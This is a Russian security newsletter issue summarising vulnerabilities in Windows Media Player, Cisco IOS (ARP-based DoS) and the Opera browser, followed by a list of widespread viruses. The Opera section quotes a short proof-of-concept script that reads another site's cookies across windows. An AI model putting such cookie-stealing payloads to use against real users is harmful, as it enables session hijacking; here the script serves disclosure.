Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Новости безопасноcти компьютерных сетей


Служба Рассылок Subscribe.Ru
"Безопасность - это процесс"


Выпуск 30


Уважаемые подписчики мы рады приветствовать Вас!


Переполнение буфера в Windows Media Player

  20 ноября Microsoft обнародовала очередной бюллетень по безопасности своих продуктов, в котором уведомила пользователей о том, что в Windows Media Player обнаружена возможность переполнения буфера, позволяющая атакующему выполнять различные коды с повышенными привилегиями.
  Суть уязвимости состоит в отсутствии проверки величины задействованной для обработки данных в формате ASF памяти. Этот формат данных используется для передачи потокового мультимедиа трафика. Таким образом, можно вызвать либо крах WMP, а если атакующий более искушен в вопросах безопасности, то и повысить привилегии.
  Для устранения переполнения буфера Microsoft рекомендует скачать и установить патчи для версий WMP 6.4, 7, 7.1 и XP

Возможность несанкционированного изменения ARP таблицы в Cisco IOS

  На днях компанией Cisco распространен бюллетень по безопасности собственных продуктов. В котором уведомляет клиентов, использующих оборудование с предустановленной операционной системой Cisco IOS, о обнаруженной уязвимости, позволяющей изменять ARP таблицы.
  Суть уязвимости заключается в том, что при помощи пакета ARP отправленного на широковещательный адрес маршрутизатора, происходит перезапись таблицы ARP, что является причиной шторма ответных запросов. И ни локальный хост, ни маршрутизатор не в состоянии обрабатывать ARP запросы. Таким образом, реализуется атака типа DoS.
  Такое некорректное функционирование Cisco IOS было выявлено в следующих марках оборудования компании Cisco:
  • маршрутизаторы AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, и 12000 серий;
  • ATM свитч серии LS1010;
  • Catalyst 6000;
  • Catalyst 2900XL;
  • свитчи Catalyst 1900, 2800, 2900, 3000, и 5000 серии;
  • Cisco DistributedDirector.

  Вендор настоятельно рекомендует пользователям администраторам, чьи сети используют вышеперечисленное оборудование, произвести апгрейд программного обеспечения текущих версий Cisco IOS, на те в которых эта уязвимость устранена. Для этого необходимо обратиться к авторизованным реселерам, у которых это оборудование было приобретено. Таблицу версий Cisco IOS, подлежащих апгрейду можно найти в официально релизе компании.


Уязвимость браузера Opera

  В популярном Web-браузере Opera обнаружена уязвимость, позволяющая злоумышленнику получить доступ к cookies и кэшу атакуемого браузера.
  Реализация такого плана атаки становится возможным благодаря некорректной обработки Java-апплетов и скриптов. Данная уязвимость экспериментально была обнаружена Georgi Guninski в Opera версии 5.02, 5.10, 5.12 под win32 и Opera 5.10 для Linux.
  О данной уязвимости было сообщено компании производителю, на что последовал ответ, содержащий советы по устранению этой уязвимости. Вся суть совета заключалась в отключении выполнения Java в браузере. Ниже приведен образец Java апплета, позволяющего использовать обнаруженную уязвимость:

a=window.open("http://mail.yahoo.com";);
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("(h1)aa(/h1)(script)x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)(/"+"script)";);
a.document.close();
}
setTimeout("f()",5000);

  Более подробно о написании подобного рода скриптов можно узнать на сайте на сайте Georgi Guninski. Вся приведенная информация должна использоваться только для ознакомительных целей.


Вирусы

  За прошедший со времени выхода предыдущего номера период времени новых опасных вирусов в диком виде не было обнаружено.
  Приводим список 10 наиболее распространенных в диком виде вирусов:
  1. PE_NIMDA.A-O
  2. PE_NIMDA.E
  3. PE_NIMDA.A
  4. PE_FUNLOVE.4099
  5. TROJ_SIRCAM.A
  6. PE_MAGISTR.A
  7. W97M_MYNA
  8. PE_MAGISTR.B
  9. W97M_ETHAN.A
  10. W97M_GROOVIE


  Дополнительную информацию можно получить, направив запрос автору рассылки.
  С уважением, Игорь Камолов.

Выпуск


http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное